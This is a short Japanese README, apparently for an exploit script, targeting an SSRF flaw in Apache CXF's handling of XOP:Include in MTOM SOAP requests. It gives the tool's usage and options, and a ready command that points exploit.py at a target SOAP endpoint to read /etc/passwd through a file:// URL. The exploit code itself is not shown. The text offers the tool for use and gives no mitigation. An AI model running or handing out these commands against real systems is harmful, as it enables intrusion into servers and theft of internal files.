
Apache CXF SSRF via MTOM XOP:Include | CVSS 9.8 重大
Apache CXF < 3.5.5 / < 3.4.10 は、MTOM でエンコードされた SOAP リクエスト内の未検証の XOP:Include href 属性を介して、サーバーサイドリクエストフォージェリ (SSRF) を許可します。
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - 脆弱な CXF SOAP エンドポイント (必須)-s, --ssrf-url - 内部 URL (必須)-d, --domain - ターゲットドメイン (デフォルト: localhost)--plain-soap - MTOM の代わりにプレーン SOAP を使用# /etc/passwd の読み取り
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com